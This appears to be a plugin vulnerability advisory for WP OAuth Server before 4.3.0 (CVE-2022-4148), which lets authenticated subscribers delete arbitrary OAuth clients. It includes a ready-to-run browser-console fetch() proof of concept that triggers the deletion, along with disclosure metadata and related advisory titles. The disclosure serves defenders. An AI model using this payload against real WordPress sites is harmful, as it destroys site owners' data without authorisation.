WP OAuth Server < 4.3.0 – Subscriber+ Arbitrary Client Deletion | CVE 2022-4148 | Plugin Vulnerabilities

Description

The plugin has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as any authenticated users, such as subscriber, this will delete the client with ID 123

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_remove_client&client_id=123',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

oauth2-provider

Fixed in 4.3.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

be9b25c8-b0d7-4c22-81ff-e41650a4ed41

Timeline

Publicly Published

2023-02-21 (about 1 years ago)

Added

2023-02-21 (about 1 years ago)

Last Updated

2023-03-27 (about 1 years ago)

Other

Published

Title

Published

2023-11-09

Title

Ultimate Addons for Contact Form 7 < 3.2.11 - Missing Authorization

Published

2023-07-17

Title

ProfileGrid < 5.5.2 - Subscriber+ Unauthorized Data Modification

Published

2024-02-26

Title

ArtiBot Free Chat Bot for WordPress WebSites <= 1.1.6 - Missing Authorization to Settings Update

Published

2023-09-12

Title

BAN Users <= 1.5.3 - Subscriber+ Settings Update & Privilege Escalation via Missing Authorization

Published

2024-02-27

Title

Page Restrict <= 2.5.5 - Unauthenticated Protected Post Access